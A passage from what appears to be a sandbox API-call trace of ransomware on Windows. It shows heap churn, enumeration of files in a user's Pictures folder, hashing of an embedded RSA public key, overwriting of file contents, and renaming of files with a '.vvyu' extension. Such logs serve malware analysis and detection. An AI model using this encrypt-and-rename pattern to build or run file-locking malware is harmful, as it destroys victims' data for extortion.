Flags=0x0, Size=0x10) returned 0x2d39b80 [0190.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0190.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b50 [0190.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b38 [0190.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b98 [0190.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b38 [0190.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b08 [0190.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0190.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0190.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0190.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0190.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30d48 | out: hHeap=0x6a0000) returned 1 [0190.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0190.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.315] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x138fc, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x138fc, lpOverlapped=0x0) returned 1 [0190.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.317] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13901, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.317] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70068 [0190.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70068 | out: hHeap=0x6a0000) returned 1 [0190.318] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.318] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.318] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.318] CloseHandle (hObject=0x584) returned 1 [0190.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ed98 [0190.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0190.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed98 | out: hHeap=0x6a0000) returned 1 [0190.320] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\gFRsS2-OR13.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\gfrss2-or13.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\gFRsS2-OR13.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\gfrss2-or13.gif.vvyu")) returned 1 [0190.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.321] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x723d10 | out: hHeap=0x6a0000) returned 1 [0190.325] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfe2cd40, ftCreationTime.dwHighDateTime=0x1d8a43a, ftLastAccessTime.dwLowDateTime=0x8bbdeef0, ftLastAccessTime.dwHighDateTime=0x1d8a4c6, ftLastWriteTime.dwLowDateTime=0x8bbdeef0, ftLastWriteTime.dwHighDateTime=0x1d8a4c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P5pCqlWF", cAlternateFileName="")) returned 1 [0190.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70068 [0190.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0190.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70068 | out: hHeap=0x6a0000) returned 1 [0190.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ed98 [0190.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2eca8 [0190.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed98 | out: hHeap=0x6a0000) returned 1 [0190.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0190.326] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bed1410, ftCreationTime.dwHighDateTime=0x1d89f7c, ftLastAccessTime.dwLowDateTime=0xdd778140, ftLastAccessTime.dwHighDateTime=0x1d8a546, ftLastWriteTime.dwLowDateTime=0xdd778140, ftLastWriteTime.dwHighDateTime=0x1d8a546, nFileSizeHigh=0x0, nFileSizeLow=0x17b42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rR87s4ZrE.gif", cAlternateFileName="RR87S4~1.GIF")) returned 1 [0190.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0190.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x723d10 [0190.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0190.326] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\rR87s4ZrE.gif") returned=".gif" [0190.326] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\rR87s4ZrE.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\rr87s4zre.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.328] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=97090) returned 1 [0190.328] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.330] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17b1c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.331] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.333] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.333] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x17b42, lpOverlapped=0x0) returned 1 [0190.334] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.334] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.334] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.334] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0190.335] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.335] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.335] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.336] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.336] GetLastError () returned 0x0 [0190.336] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.336] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0190.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.336] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.336] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.336] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x17b40) returned 0x2d45778 [0190.337] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30d48 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ad8 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30d00 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39af0 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b20 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b80 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b38 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.338] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0190.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b80 [0190.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0190.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b38 [0190.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39b20 [0190.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0190.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0190.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0190.341] GetCurrentThreadId () returned 0x264 [0190.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44510 [0190.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0190.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.342] GetCurrentThreadId () returned 0x264 [0190.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.342] RtlAllocateHeap 